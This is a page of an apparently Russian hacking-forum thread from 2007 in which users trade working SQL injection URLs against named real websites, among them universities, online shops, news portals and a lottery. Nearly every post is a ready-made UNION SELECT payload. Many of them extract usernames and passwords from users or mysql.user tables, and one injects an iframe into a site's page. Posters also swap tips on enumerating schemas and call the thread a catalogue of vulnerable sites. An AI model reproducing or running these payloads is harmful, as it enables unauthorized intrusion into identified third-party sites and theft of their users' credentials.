SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. XTErner

    XTErner Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    109
    Likes Received:
    135
    Reputations:
    40
    Code:
    http://www.metafysiko.gr/interviews.php?id=-20+union+select+1,version(),3/*
    Code:
    http://www.paokworld.com/outputofarticle.php?ID=-373+union+select+1,2,user(),4,5,6,7,8,9,10/*
    Code:
    http://www.rwf.gr/episode1-new.php?id=81%20UNION%20SELECT%201,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),3,4,5,6,7,8+limit+1,1/*
    Code:
    http://www.uip.edu/fr/colloques.php?id=-9%20UNION%20SELECT%201,user(),3,4,5,6,7,8/*
     
    #1121 XTErner, 18 Mar 2007
    Last edited: 18 Mar 2007
    2 people like this.
  2. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    www.mediaprovinces.kz

    Code:
    http://www.mediaprovinces.kz/index.php?r=-1+union+select+username,2+from+phpbb_users/*

    Еще одна перед сном =)

    Вроде стандартные названия колонок не подходят =(

    Code:
    http://www.fitness.ru/news/shownews.phtml?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13+from+users/*
     
    #1122 Ksander, 18 Mar 2007
    Last edited: 19 Mar 2007
    3 people like this.
  3. VampiRUS

    VampiRUS Elder - Старейшина

    Joined:
    31 Dec 2005
    Messages:
    210
    Likes Received:
    105
    Reputations:
    57
    _http://www.hw.net.ua/photoart.php?id='+union+select+1,2,table_name,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+information_schema.tables+limit+16,1/*
     
    2 people like this.
  4. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    Code:
    http://www.infonew.ru/show.php?cid=-1+union+select+concat(login,0x3a,password)+from+users+limit+0,1/*
    
    =\
     
    1 person likes this.
  5. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    www.0577.ru

    Лотерея, довольно неплохие призы, много областей, версия 5, но там походу фильтрация при переборе колонок идет. Кто докопается вышлите мне КПК =)


    Code:
    http://www.0577.ru/index.php?region_id=-1+union+select+version()+from+mysql.user/*
     
  6. Aerot1smo

    Aerot1smo Banned

    Joined:
    6 Jul 2006
    Messages:
    73
    Likes Received:
    10
    Reputations:
    -7
    www.weight-watchers.ee
     
    1 person likes this.
  7. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    avtostarter.com

    Можно прикупить запчасти =)
    На акках довльно крупные скидки 20%+


    Code:
    http://avtostarter.com//obzor.php?k_id=-1+union+select+concat(login,char(58),pass)+from+users+limit+3,1/*
     
  8. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    чето не понятно о какой фильтрации идет речь
    http://www.0577.ru/index.php?region_id=-1+union+select+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+limit+17,100/* ;)
     
    #1128 }{0TT@БЬ)Ч, 19 Mar 2007
    Last edited: 19 Mar 2007
  9. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    =\
     
    1 person likes this.
  10. InferNo23

    InferNo23 Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    183
    Likes Received:
    126
    Reputations:
    42
    Code:
    http://www.sibdom.ru/help.php?ids=-1+union+select+1,2,concat(user_name,0x3a,user_pass),4,5,6,7+from+users/*
    Code:
    http://www.riag.ru/index.php?ids=-1+union+select+1,2,version(),4,5,6,7+from+users/*
    Code:
    http://nskfei.ru/girl.php?ids=-1+union+select+1,user(),3,version(),5,6,7,database()/*
    Code:
    http://www.zol.ru/review/show.php?ids%5B0%5D=-1+union+select+1,2,3,4,5,user(),7,8,9,10,11+user/*
    Code:
    http://sochinki.ru/girl.php?ids=-1+union+select+1,user(),3,4,5,6,7,8/*
    Code:
    http://sochinki.ru/girl.php?ids=-1+union+select+1,user(),3,4,5,6,7,8/*
     
    6 people like this.
  11. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    2Spyder
    это не перебор колонок?http://www.0577.ru/index.php?region_id=-1+union+select+COLUMN_NAME+FROM+INFORMATION_SCHEMA .COLUMNS+limit+17,100/*

    upd:
    Spyder вроде статью написал а такие простые вещи не знаешь ;)
    http://www.0577.ru/index.php?region_id=-1+union+select+AES_DECRYPT(AES_ENCRYPT(concat(user_name,char(58),user_password),0x71),0x71)+from+anum_new.auth_user+limit+0,1/*
     
    #1131 }{0TT@БЬ)Ч, 19 Mar 2007
    Last edited: 19 Mar 2007
  12. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    Spyder ее не надо подбирать :D
    TABLE_SCHEMA+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME='тут название таблицы'/* выводит в какой базе находиться таблица.
    извиняюсь за оффтоп :rolleyes:
     
    #1132 }{0TT@БЬ)Ч, 19 Mar 2007
    Last edited: 19 Mar 2007
    1 person likes this.
  13. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    судя по версии сервак на винде =\
     
  14. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    Code:
    http://www.uca.edu/maptour/index.php?id=-6+union+select+1,2,3,4,password,6+from+mysql.user/*
    http://www.flirtanica.ru

    Code:
    http://www.flirtanica.ru./articles1.php?id=-1+union+select+1,version(),3,4,5/*

    http://www.gelezo.net

    Code:
    http://www.gelezo.net/files.php?id=1'+union+select+1,2,3,4,5,version(),7,8,10,11,12,13/*

    Кстати, мы всем этим сайтам повышаем популярность, это как каталог бажных сайтов =)
     
    #1134 Ksander, 19 Mar 2007
    Last edited: 19 Mar 2007
    5 people like this.
  15. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Code:
    http://www.chita.ru/firms/index.php?page=view&id=-1+union+select+1,2,3,4,5,convert(concat(database(),char(58),user(),char(58),version()),char),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*
    Code:
    http://www.foodpages.ru/show_firm.php?id_firm=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat(database(),char(58),user(),char(58),version()),12,13/*
    Code:
    http://vdd.com.ua/Tovaru.php?idr=-1+union+select+concat(database(),char(58),user(),char(58),version())/*
     
    5 people like this.
  16. XTErner

    XTErner Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    109
    Likes Received:
    135
    Reputations:
    40
    Code:
    http://www.michaelpollan.com/article.php?id=80%20UNION%20SELECT%201,user(),3,4,5,6,7,8,9,10+limit+1,1/*
    Code:
    http://www.spectrum.am/eng/articles.php?id=-60'+union+select+1,2,version()/*
    Code:
    http://www.forumweekly.am/index.php?id=-18+union+select+1,2,user(),4,5,6/*
    Code:
    http://www.xgroup.am/news.php?id=-17+union+select+1,2,3,4,version(),6,7/*
    www.footballshop.am
    Code:
    http://www.footballshop.am/shop.php?id=-89+union+select+1,concat(name,0x3a,pwd)+from+user/*
    http://www.footballshop.am/shop.php?id=-89+union+select+1,table_name+from+INFORMATION_SCHEMA.TABLES/*
    Code:
    http://design.barsmedia.am/news.php?id=-13+union+select+1,2,table_name,4,5,6,7,8+from+INFORMATION_SCHEMA.TABLES/*
    http://design.barsmedia.am/news.php?id=-13+union+select+1,2,user(),4,5,6,7,8+from+users/*
     
    2 people like this.
  17. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    Code:
    http://www.switch.ch/de/about/news-archive.html?id=-120+union+select+1,2,3,4,5,6/*
    Одна из идеальных скулей...
    Code:
    http://www.wattstopper.com/newsroom/news.html?id=-56+union+select+concat_ws(char(58),user,password),2,3,4+from+mysql.user/*
    С таблицам неприятность =\
    Code:
    http://www.cop-morrien.de/news.html?id=-19+union+select+1,2,3,4,5,version(),database(),8,9,10,11,12/*
    Code:
    http://www.net-zone.ru/news.html?id=1+union+select+concat_ws(char(58),user,password),2,concat(version(),char(58),user(),char(58),database()),4+from+mysql.user/*
    P.s concat_ws оказался достаточно полезной фичей, имхо)
     
    4 people like this.
  18. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    www.nsu.ru

    Новосибирский Государственный Университет

    Code:
    http://www.nsu.ru/dynamic/news/news_view.php?news_mode=single&news_user=user&news_action=view&news_id=-1+union+select+version(),2,3,4,5,6,7,8/*
     
    #1138 Ksander, 19 Mar 2007
    Last edited: 19 Mar 2007
    3 people like this.
  19. Colkru

    Colkru Elder - Старейшина

    Joined:
    13 Jan 2007
    Messages:
    100
    Likes Received:
    69
    Reputations:
    9
    http://www.pizzamarketplace.com/article.php?id=-1+union+select+version(),2,3,4,5,6,7,8/*
     
    3 people like this.
  20. *D1VER

    *D1VER Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    108
    Likes Received:
    67
    Reputations:
    21
    Даже Алёна рекомендует )

    http://www.tonnel.ru/index.php?l=cal'+union+select+1,'%3Ciframe%20src=http://antichat.ru%3E%3C/iframe%3E',3,4,5,6,7+from+forum/*
     
    #1140 *D1VER, 19 Mar 2007
    Last edited: 19 Mar 2007
    5 people like this.
Thread Status:
Not open for further replies.